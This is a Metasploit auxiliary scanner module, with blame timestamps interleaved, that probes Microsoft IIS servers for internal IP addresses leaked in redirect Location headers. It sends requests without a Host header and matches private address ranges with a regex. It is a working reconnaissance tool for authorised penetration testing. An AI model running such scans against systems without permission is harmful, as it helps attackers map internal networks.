2012-02-20 04:44:30 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2012-02-20 04:44:30 +00:00
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Microsoft IIS HTTP Internal IP Disclosure',
|
|
|
|
'Description' => %q{
|
2017-08-27 01:01:10 +00:00
|
|
|
Collect any leaked internal IPs by requesting commonly redirected locations from IIS.
|
2013-08-30 21:28:54 +00:00
|
|
|
},
|
|
|
|
'Author' => ['Heather Pilkington'],
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(target_host)
|
|
|
|
uris = ["/","/images","/default.htm"]
|
|
|
|
|
|
|
|
uris.each do |uri|
|
|
|
|
#Must use send_recv() in order to send a HTTP request without the 'Host' header
|
|
|
|
c = connect
|
|
|
|
res = c.send_recv("GET #{uri} HTTP/1.0\r\n\r\n", 25)
|
|
|
|
|
|
|
|
if res.nil?
|
|
|
|
print_error("no response for #{target_host}")
|
|
|
|
|
|
|
|
elsif (res.code > 300 and res.code < 310)
|
|
|
|
intipregex = /(192\.168\.[0-9]{1,3}\.[0-9]{1,3}|10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})/i
|
|
|
|
print_good("Location Header: #{res.headers["Location"]}")
|
|
|
|
result = res.headers["Location"].scan(intipregex).uniq.flatten
|
|
|
|
|
|
|
|
if result.length > 0
|
|
|
|
print_good("Result for #{target_host} found Internal IP: #{result.first}")
|
|
|
|
end
|
|
|
|
|
|
|
|
report_note({
|
|
|
|
:host => target_host,
|
|
|
|
:port => rport,
|
|
|
|
:proto => 'tcp',
|
|
|
|
:sname => (ssl ? 'https' : 'http'),
|
|
|
|
:type => 'iis.ip',
|
|
|
|
:data => result.first
|
|
|
|
})
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
end
|
2012-02-20 04:44:30 +00:00
|
|
|
end
|